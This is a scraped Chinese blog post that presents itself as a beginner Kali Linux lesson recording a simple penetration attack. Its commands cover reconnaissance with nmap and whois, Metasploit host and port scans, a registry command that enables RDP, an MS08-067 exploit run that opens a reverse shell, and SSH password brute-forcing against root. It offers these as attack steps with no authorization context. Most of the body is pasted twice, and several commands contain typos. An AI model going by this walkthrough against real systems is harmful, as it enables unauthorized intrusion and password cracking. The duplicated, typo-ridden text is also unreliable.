Kali Linux入门第二课 | 一次简单的渗透笔记
来源:互联网 发布:手机淘宝买彩票 编辑:程序博客网 时间:2024/04/28 17:28
下面是最近的一次简单的渗透攻击具体思路,涉及到2个系统服务攻击,记住一步一步的看,虽然很多人都像我一样对直接入侵电脑感兴趣,但是他的前期是枯燥无味,不过一定要一步一步的看完,因为通往权限的路,很艰难。MS12这个漏洞呢你可以通过msfconsole来进
行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我
此教程仅为菜鸟,小白,入门提供,大鸟请飞走。
。。。。。。
攻击前期 信息收集
攻击中 利用漏洞
攻击后 后渗透攻击
网络踩点 ip踩点
whois域名注册信息查询
whois 域名 testfire.net
nslookup与dig域名查询
查询服务器上的cache非权威
终端输入nslookup
进入后set type=A
域名输入
exit退出
dig查询 可以指定具体的服务器查询
dig ip 域名
IP2location地理位置查询
www.maxmind.com 国外
www.cz88.net 国内
www.cnwzml.com 国内
netcraft实现信息查询服务
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
网络踩点 搜索引擎
谷歌语法
parent directory site:域名
sete:域名 filetype:xls xls为格式
搜索email地址
msf use auxiliary/gather/search_email_collector
扩普路径踩点
traceroute 域名
tcptraceroute 域名
主机扫描 找出活跃主机
ping ip 太简单
ping -c 表示数量
ping -s 表述数据包大小
arping 别躲了 ,必有
arping ip
在arp的基础上加入网段扫描
arp-scan --interface=eth2 这是网卡 ip/24
nbtscan 扫描
nbtscan ip/24
nmap 最强工具,不解释
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole扫描主机
msfconsole进入
msf use auxiliary/scanner/discovery/arp_sweep 调用主机扫描模块
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那个网段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 线程
msf run 执行
系统扫描
xprobe2 ip
nmap -O ip
端口扫描
metaspolit端口扫描
块不容易被发现
msf use auxiliary/scanner/portscan/syn 端口扫描模块
msf set RHOSTS ip
msf set THREADS 20 线程数
run执行
back 退出
Nmap 端口服务系统探测
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞扫描附带渗透攻击全程
MS12-020系统高危漏洞
一般开启3389端口的xp和server 2003都有
DOS开启windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
蓝屏
MS08-067系统高危漏洞的渗透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 调用ms08渗透攻击模块
msf show payloads 查看载荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 设置目标ip
msf set LHOST ip 设置本地ip
msf set LPORT 5000本地端口
msf set target 5 设置目标系统操作代码为5,这里指windows server 2003
msf show options 再次检查渗透攻击参数
msf exploit 执行渗透
拿到shell 成功渗透
后面是后渗透攻击小部分
Telnet网络查点
用户账户名:口令猜测破解
错误配置的共享资源 恶意程序上传
老旧版本的网络服务版本 缓冲区于出漏洞攻击
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 调用模块
msf set RHOSTS ip/24
msf set THREADS 100 设置线程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 调用模块
msf set RHOSTS ip
msf set USERNAME root 账户
msf set PASS_FILE/root/wonds.txt 设置目录
msf set THPEADS 50 设置线程
msf run
Nessus
就是折磨简单,不过这只是渗透的一部分,由于本人技术原因,也就只能写到这了,后渗透攻击,和一些其他的渗透系统攻击之类的本人还并不会,
行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我
此教程仅为菜鸟,小白,入门提供,大鸟请飞走。
。。。。。。
攻击前期 信息收集
攻击中 利用漏洞
攻击后 后渗透攻击
网络踩点 ip踩点
whois域名注册信息查询
whois 域名 testfire.net
nslookup与dig域名查询
查询服务器上的cache非权威
终端输入nslookup
进入后set type=A
域名输入
exit退出
dig查询 可以指定具体的服务器查询
dig ip 域名
IP2location地理位置查询
www.maxmind.com 国外
www.cz88.net 国内
www.cnwzml.com 国内
netcraft实现信息查询服务
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
网络踩点 搜索引擎
谷歌语法
parent directory site:域名
sete:域名 filetype:xls xls为格式
搜索email地址
msf use auxiliary/gather/search_email_collector
扩普路径踩点
traceroute 域名
tcptraceroute 域名
主机扫描 找出活跃主机
ping ip 太简单
ping -c 表示数量
ping -s 表述数据包大小
arping 别躲了 ,必有
arping ip
在arp的基础上加入网段扫描
arp-scan --interface=eth2 这是网卡 ip/24
nbtscan 扫描
nbtscan ip/24
nmap 最强工具,不解释
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole扫描主机
msfconsole进入
msf use auxiliary/scanner/discovery/arp_sweep 调用主机扫描模块
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那个网段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 线程
msf run 执行
系统扫描
xprobe2 ip
nmap -O ip
端口扫描
metaspolit端口扫描
块不容易被发现
msf use auxiliary/scanner/portscan/syn 端口扫描模块
msf set RHOSTS ip
msf set THREADS 20 线程数
run执行
back 退出
Nmap 端口服务系统探测
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞扫描附带渗透攻击全程
MS12-020系统高危漏洞
一般开启3389端口的xp和server 2003都有
DOS开启windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
蓝屏
MS08-067系统高危漏洞的渗透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 调用ms08渗透攻击模块
msf show payloads 查看载荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 设置目标ip
msf set LHOST ip 设置本地ip
msf set LPORT 5000本地端口
msf set target 5 设置目标系统操作代码为5,这里指windows server 2003
msf show options 再次检查渗透攻击参数
msf exploit 执行渗透
拿到shell 成功渗透
后面是后渗透攻击小部分
Telnet网络查点
用户账户名:口令猜测破解
错误配置的共享资源 恶意程序上传
老旧版本的网络服务版本 缓冲区于出漏洞攻击
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 调用模块
msf set RHOSTS ip/24
msf set THREADS 100 设置线程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 调用模块
msf set RHOSTS ip
msf set USERNAME root 账户
msf set PASS_FILE/root/wonds.txt 设置目录
msf set THPEADS 50 设置线程
msf run
Nessus
就是折磨简单,不过这只是渗透的一部分,由于本人技术原因,也就只能写到这了,后渗透攻击,和一些其他的渗透系统攻击之类的本人还并不会,
阅读全文
1 0
- Kali Linux入门第二课 | 一次简单的渗透笔记
- Kali Linux 无线渗透测试入门指南 第二章 WLAN 和固有的不安全性
- kali linux web渗透测试学习笔记
- kali linux web渗透测试学习笔记
- kali利用MS08_067简单渗透的过程
- Kali Linux Web 渗透测试秘籍 第二章 侦查
- Kali Linux渗透测试第二步:漏洞评估
- kali-linux网络渗透
- Kali Linux 安全渗透教程<第二更>Linux安全渗透简介
- Kali Linux 无线渗透测试入门指南 翻译完成!
- 【安全牛学习笔记】Kali Linux渗透测试介绍
- 【安全牛学习笔记】Kali Linux渗透测试介绍
- 【安全牛学习笔记】Kali Linux渗透测试方法
- 记一次简单的渗透测试经过
- 对武汉大学的一次简单渗透
- Kali Linux 无线渗透测试入门指南 第九章 无线渗透测试方法论
- kali Linux渗透测试介绍
- Kali Linux渗透测试方法
- Python学习笔记 --- 循环遍历时间区间
- insertAdjacentHTML方法详解
- Leetcode之Merge Sorted Array 问题
- 207. Course Schedule
- WEB会话跟踪技术
- Kali Linux入门第二课 | 一次简单的渗透笔记
- QCon上海2017,一起探索新技术的奥秘
- HTTP协议的请求方法
- 使用ijkplayer 查看大华固定ip摄像头
- svn报错can only be performed on a version resource [at this time].
- python2的print和python3的print()
- data.jpa.repository 数据库查询
- java之配置文件加载
- leetcode 220. Contains Duplicate III TreeSet和SortedSet的应用